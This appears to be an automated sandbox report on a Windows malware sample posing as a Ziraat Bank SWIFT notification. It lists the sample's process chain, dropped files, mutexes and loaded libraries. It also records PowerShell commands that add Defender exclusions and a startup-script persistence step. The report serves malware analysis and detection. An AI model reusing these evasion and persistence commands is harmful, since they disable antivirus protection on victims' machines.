Source: AcroCEF.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@38/165@55/19

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046A06A GetLastError,FormatMessageW,

0_2_0046A06A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,		0_2_004581CB
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004587E1

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0046B333

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0047EE0D

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0046C397

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00404E89

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00AFCBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

File created: C:\Users\user\AppData\Roaming\a8259331cca430bb.bin

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Users\user\AppData\Roaming\XClient.exe	Mutant created: NULL
Source: C:\Windows\System32\alg.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-a8259331cca430bb9ea72c54-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a8259331cca430bb-inf
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a8259331cca430bb7d8e3ee9-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\XoFHv1TT4hWErxRo

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

File created: C:\Users\user\AppData\Local\Temp\aut9353.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Virustotal: Detection: 79%
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

File read: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown	Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown	Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown	Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown	Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown	Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\differences\niellist.exe"

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll
